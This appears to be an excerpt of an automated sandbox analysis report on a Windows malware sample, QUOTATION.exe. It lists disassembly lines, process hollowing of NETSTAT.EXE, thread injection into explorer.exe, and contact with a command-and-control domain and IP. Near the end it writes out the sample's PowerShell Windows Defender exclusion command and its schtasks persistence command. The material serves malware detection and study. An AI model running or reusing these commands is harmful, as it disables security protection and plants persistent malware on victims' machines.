          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01094496 mov eax, dword ptr fs:[00000030h]17_2_01094496
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF7D50 mov eax, dword ptr fs:[00000030h]17_2_00FF7D50
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h]17_2_00FE3D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDAD30 mov eax, dword ptr fs:[00000030h]17_2_00FDAD30
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8CD6 mov eax, dword ptr fs:[00000030h]17_2_010A8CD6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010914FB mov eax, dword ptr fs:[00000030h]17_2_010914FB
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]17_2_01056CF0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]17_2_01056CF0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h]17_2_01056CF0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A070D mov eax, dword ptr fs:[00000030h]17_2_010A070D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A070D mov eax, dword ptr fs:[00000030h]17_2_010A070D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A70E mov eax, dword ptr fs:[00000030h]17_2_0100A70E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A70E mov eax, dword ptr fs:[00000030h]17_2_0100A70E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FF10 mov eax, dword ptr fs:[00000030h]17_2_0106FF10
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FF10 mov eax, dword ptr fs:[00000030h]17_2_0106FF10
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE76E2 mov eax, dword ptr fs:[00000030h]17_2_00FE76E2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100E730 mov eax, dword ptr fs:[00000030h]17_2_0100E730
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8F6A mov eax, dword ptr fs:[00000030h]17_2_010A8F6A
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h]17_2_00FFAE73
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]17_2_01057794
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]17_2_01057794
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01057794 mov eax, dword ptr fs:[00000030h]17_2_01057794
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE766D mov eax, dword ptr fs:[00000030h]17_2_00FE766D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h]17_2_00FE7E41
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDE620 mov eax, dword ptr fs:[00000030h]17_2_00FDE620
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010137F5 mov eax, dword ptr fs:[00000030h]17_2_010137F5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]17_2_00FDC600
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]17_2_00FDC600
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h]17_2_00FDC600
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01008E00 mov eax, dword ptr fs:[00000030h]17_2_01008E00
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01091608 mov eax, dword ptr fs:[00000030h]17_2_01091608
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A61C mov eax, dword ptr fs:[00000030h]17_2_0100A61C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100A61C mov eax, dword ptr fs:[00000030h]17_2_0100A61C
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108FE3F mov eax, dword ptr fs:[00000030h]17_2_0108FE3F
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AE44 mov eax, dword ptr fs:[00000030h]17_2_0109AE44
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109AE44 mov eax, dword ptr fs:[00000030h]17_2_0109AE44
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE8794 mov eax, dword ptr fs:[00000030h]17_2_00FE8794
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0106FE87 mov eax, dword ptr fs:[00000030h]17_2_0106FE87
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEFF60 mov eax, dword ptr fs:[00000030h]17_2_00FEFF60
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010546A7 mov eax, dword ptr fs:[00000030h]17_2_010546A7
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]17_2_010A0EA5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]17_2_010A0EA5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h]17_2_010A0EA5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FEEF40 mov eax, dword ptr fs:[00000030h]17_2_00FEEF40
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB73D mov eax, dword ptr fs:[00000030h]17_2_00FFB73D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB73D mov eax, dword ptr fs:[00000030h]17_2_00FFB73D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01018EC7 mov eax, dword ptr fs:[00000030h]17_2_01018EC7
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0108FEC0 mov eax, dword ptr fs:[00000030h]17_2_0108FEC0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010036CC mov eax, dword ptr fs:[00000030h]17_2_010036CC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD4F2E mov eax, dword ptr fs:[00000030h]17_2_00FD4F2E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FD4F2E mov eax, dword ptr fs:[00000030h]17_2_00FD4F2E
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8ED6 mov eax, dword ptr fs:[00000030h]17_2_010A8ED6
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010016E0 mov ecx, dword ptr fs:[00000030h]17_2_010016E0
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFF716 mov eax, dword ptr fs:[00000030h]17_2_00FFF716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330131B mov eax, dword ptr fs:[00000030h]24_2_0330131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h]24_2_0326A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324DB60 mov ecx, dword ptr fs:[00000030h]24_2_0324DB60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03273B7A mov eax, dword ptr fs:[00000030h]24_2_03273B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03273B7A mov eax, dword ptr fs:[00000030h]24_2_03273B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324DB40 mov eax, dword ptr fs:[00000030h]24_2_0324DB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03318B58 mov eax, dword ptr fs:[00000030h]24_2_03318B58
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324F358 mov eax, dword ptr fs:[00000030h]24_2_0324F358
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h]24_2_03274BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h]24_2_03274BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h]24_2_03274BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03315BA5 mov eax, dword ptr fs:[00000030h]24_2_03315BA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03251B8F mov eax, dword ptr fs:[00000030h]24_2_03251B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03251B8F mov eax, dword ptr fs:[00000030h]24_2_03251B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032FD380 mov ecx, dword ptr fs:[00000030h]24_2_032FD380
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03272397 mov eax, dword ptr fs:[00000030h]24_2_03272397
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327B390 mov eax, dword ptr fs:[00000030h]24_2_0327B390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330138A mov eax, dword ptr fs:[00000030h]24_2_0330138A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]24_2_032703E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]24_2_032703E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]24_2_032703E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]24_2_032703E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]24_2_032703E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h]24_2_032703E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032F23E3 mov ecx, dword ptr fs:[00000030h]24_2_032F23E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032F23E3 mov ecx, dword ptr fs:[00000030h]24_2_032F23E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032F23E3 mov eax, dword ptr fs:[00000030h]24_2_032F23E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326DBE9 mov eax, dword ptr fs:[00000030h]24_2_0326DBE9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032C53CA mov eax, dword ptr fs:[00000030h]24_2_032C53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032C53CA mov eax, dword ptr fs:[00000030h]24_2_032C53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03284A2C mov eax, dword ptr fs:[00000030h]24_2_03284A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03284A2C mov eax, dword ptr fs:[00000030h]24_2_03284A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h]24_2_0326A229
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330AA16 mov eax, dword ptr fs:[00000030h]24_2_0330AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330AA16 mov eax, dword ptr fs:[00000030h]24_2_0330AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03258A0A mov eax, dword ptr fs:[00000030h]24_2_03258A0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324AA16 mov eax, dword ptr fs:[00000030h]24_2_0324AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0324AA16 mov eax, dword ptr fs:[00000030h]24_2_0324AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03245210 mov eax, dword ptr fs:[00000030h]24_2_03245210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03245210 mov ecx, dword ptr fs:[00000030h]24_2_03245210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03245210 mov eax, dword ptr fs:[00000030h]24_2_03245210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03245210 mov eax, dword ptr fs:[00000030h]24_2_03245210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03263A1C mov eax, dword ptr fs:[00000030h]24_2_03263A1C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032FB260 mov eax, dword ptr fs:[00000030h]24_2_032FB260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032FB260 mov eax, dword ptr fs:[00000030h]24_2_032FB260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0328927A mov eax, dword ptr fs:[00000030h]24_2_0328927A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03318A62 mov eax, dword ptr fs:[00000030h]24_2_03318A62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03249240 mov eax, dword ptr fs:[00000030h]24_2_03249240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03249240 mov eax, dword ptr fs:[00000030h]24_2_03249240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03249240 mov eax, dword ptr fs:[00000030h]24_2_03249240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03249240 mov eax, dword ptr fs:[00000030h]24_2_03249240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0330EA55 mov eax, dword ptr fs:[00000030h]24_2_0330EA55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032D4257 mov eax, dword ptr fs:[00000030h]24_2_032D4257
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]24_2_032452A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]24_2_032452A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]24_2_032452A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]24_2_032452A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h]24_2_032452A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325AAB0 mov eax, dword ptr fs:[00000030h]24_2_0325AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0325AAB0 mov eax, dword ptr fs:[00000030h]24_2_0325AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327FAB0 mov eax, dword ptr fs:[00000030h]24_2_0327FAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327D294 mov eax, dword ptr fs:[00000030h]24_2_0327D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327D294 mov eax, dword ptr fs:[00000030h]24_2_0327D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03272AE4 mov eax, dword ptr fs:[00000030h]24_2_03272AE4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h]24_2_03304AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03272ACB mov eax, dword ptr fs:[00000030h]24_2_03272ACB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov eax, dword ptr fs:[00000030h]24_2_03264120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov eax, dword ptr fs:[00000030h]24_2_03264120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov eax, dword ptr fs:[00000030h]24_2_03264120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov eax, dword ptr fs:[00000030h]24_2_03264120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_03264120 mov ecx, dword ptr fs:[00000030h]24_2_03264120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 24_2_0327513A mov eax, dword ptr fs:[00000030h]24_2_0327513A
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0040ACF0 LdrLoadDll,17_2_0040ACF0
          Source: C:\Users\user\Desktop\QUOTATION.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.purelai.store
          Source: C:\Windows\explorer.exeNetwork Connect: 208.51.62.42 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1050000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QUOTATION.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QUOTATION.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3352Jump to behavior
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmpJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exeJump to behavior
